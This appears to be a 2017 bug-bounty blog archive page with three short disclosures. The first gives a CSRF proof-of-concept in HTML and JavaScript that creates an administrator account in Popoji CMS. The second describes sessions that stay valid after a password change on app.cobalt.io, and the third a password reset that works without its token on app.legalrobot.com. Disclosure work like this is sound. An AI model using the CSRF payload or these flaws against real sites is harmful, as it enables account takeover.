Posts

Showing posts from September, 2017

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th
Post a Comment
Read more

Session not expired when password has been changed [app.cobalt.io]

Image
Session not expired when password has been changed on app.cobalt.io Description When user change password from another platform, the previous platform still connect to account and still can edit the profile. POC : 1. Login on mozilla, 2. Login on Chrome, 3. change the password on chrome. 4. back to mozilla, you still able to access the account 5. you still can edit profile. Video :  https://youtu.be/Cz2zh7w4n6M (unlisted ) Bounty : Note : I ask permission to app.cobalt.io to write it on my blog, and them give me the permission, so I write here, Hope you enjoy~
Post a Comment
Read more

Password Reset Token Issue [app.legalrobot.com]

Image
Password Reset Token Issue [app.legalrobot.com] Summary Can still change password without token Step to Reproduce Request for password reset link. Go to email and click on password reset link https://app.legalrobot.com/password-reset/token?v=uWe_yFJS0-N9fIk0nG0b0NZ70lkwNNi7RdUZu0KhiaX Now remove the token and use the link https://app.legalrobot.com/password-reset Observe that able to reset the password without the token. Fix : Always password reset link should work with a valid token. Reference : https://hackerone.com/reports/253934 At first time my report got N/A and I explain little bit and get bounty 20$ yay, you can see my original report on https://hackerone.com/reports/265775 Thanks,
Post a Comment
Read more